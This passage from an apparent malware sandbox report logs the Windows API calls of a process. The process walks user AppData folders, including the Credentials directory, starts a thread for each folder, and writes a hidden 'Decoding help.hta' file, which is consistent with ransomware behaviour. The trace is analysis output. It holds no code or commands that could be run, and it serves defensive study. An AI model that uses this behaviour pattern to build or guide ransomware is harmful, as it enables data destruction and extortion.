nFileSizeLow=0xd, dwReserved0=0x0, dwReserved1=0x0, cFileName="www.google[1].xml", cAlternateFileName="WWWGOO~1.XML")) returned 1 [0059.774] lstrcpyW (in: lpString1=0x10958800, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\*.*" [0059.774] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\*.*") returned 100 [0059.774] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\Decoding help.hta" [0059.774] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\3o75jdme\\decoding help.hta")) returned 0xffffffff [0059.774] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\3o75jdme\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xdf4 [0061.278] WriteFile (in: hFile=0xdf4, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x14b9fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x14b9fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.279] CloseHandle (hObject=0xdf4) returned 1 [0061.279] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0061.279] FindNextFileW (in: hFindFile=0x5e3570, lpFindFileData=0x14b9fd30 | out: lpFindFileData=0x14b9fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x605dd8a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x605dd8a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x696aec80, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd, dwReserved0=0x0, dwReserved1=0x0, cFileName="www.google[1].xml", cAlternateFileName="WWWGOO~1.XML")) returned 0 [0061.279] FindClose (in: hFindFile=0x5e3570 | out: hFindFile=0x5e3570) returned 1 Thread: id = 934 os_tid = 0xbd8 [0059.966] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\applet\\*.*", lpFindFileData=0x390fd30 | out: lpFindFileData=0x390fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7444ab00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7444ab00, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7444ab00, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da4b8 [0059.966] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.966] FindNextFileW (in: hFindFile=0x5da4b8, lpFindFileData=0x390fd30 | out: lpFindFileData=0x390fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7444ab00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7444ab00, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7444ab00, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.966] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0059.966] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.966] FindNextFileW (in: hFindFile=0x5da4b8, lpFindFileData=0x390fd30 | out: lpFindFileData=0x390fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7444ab00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7444ab00, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7444ab00, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0059.967] FindClose (in: hFindFile=0x5da4b8 | out: hFindFile=0x5da4b8) returned 1 Thread: id = 935 os_tid = 0x7b0 [0059.972] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*", lpFindFileData=0x698fd30 | out: lpFindFileData=0x698fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x962f4540, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x962f4540, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da4b8 [0059.972] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.973] FindNextFileW (in: hFindFile=0x5da4b8, lpFindFileData=0x698fd30 | out: lpFindFileData=0x698fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x962f4540, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x962f4540, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.973] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0059.973] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.973] FindNextFileW (in: hFindFile=0x5da4b8, lpFindFileData=0x698fd30 | out: lpFindFileData=0x698fd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xea43994d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Credentials", cAlternateFileName="CREDEN~1")) returned 1 [0059.973] lstrcmpW (lpString1=".", lpString2="Credentials") returned -1 [0059.973] lstrcmpW (lpString1="..", lpString2="Credentials") returned -1 [0059.973] lstrcmpiW (lpString1="windows", lpString2="Credentials") returned 1 [0059.973] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*" [0059.973] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*") returned 61 [0059.973] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\", lpString2="Credentials" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Credentials") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Credentials" [0059.973] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Credentials", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Credentials\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Credentials\\*.*" [0059.973] GlobalMemoryStatus (in: lpBuffer=0x698fd10 | out: lpBuffer=0x698fd10) [0059.973] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2a6a8050, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x42c [0059.980] CloseHandle (hObject=0x42c) returned 1 [0059.981] FindNextFileW (in: hFindFile=0x5da4b8, lpFindFileData=0x698fd30 | out: lpFindFileData=0x698fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x32121370, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x32121370, ftLastAccessTime.dwHighDateTime=0x1d2fa9b, ftLastWriteTime.dwLowDateTime=0x32121370, ftLastWriteTime.dwHighDateTime=0x1d2fa9b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Event Viewer", cAlternateFileName="EVENTV~1")) returned 1 [0059.981] lstrcmpW (lpString1=".", lpString2="Event Viewer") returned -1 [0059.981] lstrcmpW (lpString1="..", lpString2="Event Viewer") returned -1 [0059.981] lstrcmpiW (lpString1="windows", lpString2="Event Viewer") returned 1 [0059.981] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*" [0059.981] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*") returned 61 [0059.981] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\", lpString2="Event Viewer" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Event Viewer") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Event Viewer" [0059.981] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Event Viewer", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Event Viewer\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Event Viewer\\*.*" [0059.981] GlobalMemoryStatus (in: lpBuffer=0x698fd10 | out: lpBuffer=0x698fd10) [0059.981] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2a8506a8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x42c [0059.989] CloseHandle (hObject=0x42c) returned 1 [0059.989] FindNextFileW (in: hFindFile=0x5da4b8, lpFindFileData=0x698fd30 | out: lpFindFileData=0x698fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f14980, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xff0498b1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Feeds", cAlternateFileName="")) returned 1 [0059.989] lstrcmpW (lpString1=".", lpString2="Feeds") returned -1 [0059.989] lstrcmpW (lpString1="..", lpString2="Feeds") returned -1 [0059.989] lstrcmpiW (lpString1="windows", lpString2="Feeds") returned 1 [0059.989] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*" [0059.989] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*") returned 61 [0059.989] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\", lpString2="Feeds" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds" [0059.989] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\*.*" [0059.989] GlobalMemoryStatus (in: lpBuffer=0x698fd10 | out: lpBuffer=0x698fd10) [0059.990] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9a32f30, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x42c [0059.995] CloseHandle (hObject=0x42c) returned 1 [0059.995] FindNextFileW (in: hFindFile=0x5da4b8, lpFindFileData=0x698fd30 | out: lpFindFileData=0x698fd30*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f3aae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfea09ee5, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Feeds Cache", cAlternateFileName="FEEDSC~1")) returned 1 [0059.995] lstrcmpW (lpString1=".", lpString2="Feeds Cache") returned -1 [0059.995] lstrcmpW (lpString1="..", lpString2="Feeds Cache") returned -1 [0059.995] lstrcmpiW (lpString1="windows", lpString2="Feeds Cache") returned 1 [0059.995] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*" [0059.995] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*") returned 61 [0059.995] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\", lpString2="Feeds Cache" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache" [0059.995] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\*.*" [0059.995] GlobalMemoryStatus (in: lpBuffer=0x698fd10 | out: lpBuffer=0x698fd10) [0059.995] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2a828630, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x42c [0060.019] CloseHandle (hObject=0x42c) returned 1 [0060.019] FindNextFileW (in: hFindFile=0x5da4b8, lpFindFileData=0x698fd30 | out: lpFindFileData=0x698fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3d1d6940, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x3d1d6940, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x3d1d6940, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FORMS", cAlternateFileName="")) returned 1 [0060.019] lstrcmpW (lpString1=".", lpString2="FORMS") returned -1 [0060.019] lstrcmpW (lpString1="..", lpString2="FORMS") returned -1 [0060.019] lstrcmpiW (lpString1="windows", lpString2="FORMS") returned 1 [0060.019] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*" [0060.019] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*") returned 61 [0060.020] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\", lpString2="FORMS" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\FORMS") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\FORMS" [0060.020] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\FORMS", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\FORMS\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\FORMS\\*.*" [0060.020] GlobalMemoryStatus (in: lpBuffer=0x698fd10 | out: lpBuffer=0x698fd10) [0060.020] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x11711b58, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x42c [0060.026] CloseHandle (hObject=0x42c) returned 1 [0060.026] FindNextFileW (in: hFindFile=0x5da4b8, lpFindFileData=0x698fd30 | out: lpFindFileData=0x698fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd754c00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd754c00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd754c00, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IME12", cAlternateFileName="")) returned 1 [0060.026] lstrcmpW (lpString1=".", lpString2="IME12") returned -1 [0060.026] lstrcmpW (lpString1="..", lpString2="IME12") returned -1 [0060.026] lstrcmpiW (lpString1="windows", lpString2="IME12") returned 1 [0060.026] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*" [0060.026] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*") returned 61 [0060.026] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\", lpString2="IME12" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IME12") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IME12" [0060.026] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IME12", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IME12\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IME12\\*.*" [0060.026] GlobalMemoryStatus (in: lpBuffer=0x698fd10 | out: lpBuffer=0x698fd10) [0060.027] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2a6d00c8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x42c [0060.032] CloseHandle (hObject=0x42c) returned 1 [0060.032] FindNextFileW (in: hFindFile=0x5da4b8, lpFindFileData=0x698fd30 | out: lpFindFileData=0x698fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IMJP12", cAlternateFileName="")) returned 1 [0060.032] lstrcmpW (lpString1=".", lpString2="IMJP12") returned -1 [0060.032] lstrcmpW (lpString1="..", lpString2="IMJP12") returned -1 [0060.032] lstrcmpiW (lpString1="windows", lpString2="IMJP12") returned 1 [0060.032] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*" [0060.032] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*") returned 61 [0060.032] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\", lpString2="IMJP12" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP12") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP12" [0060.032] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP12", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP12\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP12\\*.*" [0060.032] GlobalMemoryStatus (in: lpBuffer=0x698fd10 | out: lpBuffer=0x698fd10) [0060.032] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10f27290, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x42c [0060.043] CloseHandle (hObject=0x42c) returned 1 [0060.043] FindNextFileW (in: hFindFile=0x5da4b8, lpFindFileData=0x698fd30 | out: lpFindFileData=0x698fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IMJP8_1", cAlternateFileName="")) returned 1 [0060.043] lstrcmpW (lpString1=".", lpString2="IMJP8_1") returned -1 [0060.043] lstrcmpW (lpString1="..", lpString2="IMJP8_1") returned -1 [0060.043] lstrcmpiW (lpString1="windows", lpString2="IMJP8_1") returned 1 [0060.044] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*" [0060.044] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*") returned 61 [0060.044] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\", lpString2="IMJP8_1" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP8_1") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP8_1" [0060.044] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP8_1", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP8_1\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP8_1\\*.*" [0060.044] GlobalMemoryStatus (in: lpBuffer=0x698fd10 | out: lpBuffer=0x698fd10) [0060.044] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5e9ec20, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x42c [0060.048] CloseHandle (hObject=0x42c) returned 1 [0060.048] FindNextFileW (in: hFindFile=0x5da4b8, lpFindFileData=0x698fd30 | out: lpFindFileData=0x698fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IMJP9_0", cAlternateFileName="")) returned 1 [0060.048] lstrcmpW (lpString1=".", lpString2="IMJP9_0") returned -1 [0060.048] lstrcmpW (lpString1="..", lpString2="IMJP9_0") returned -1 [0060.048] lstrcmpiW (lpString1="windows", lpString2="IMJP9_0") returned 1 [0060.048] lstrcatW (in: lpString1="", 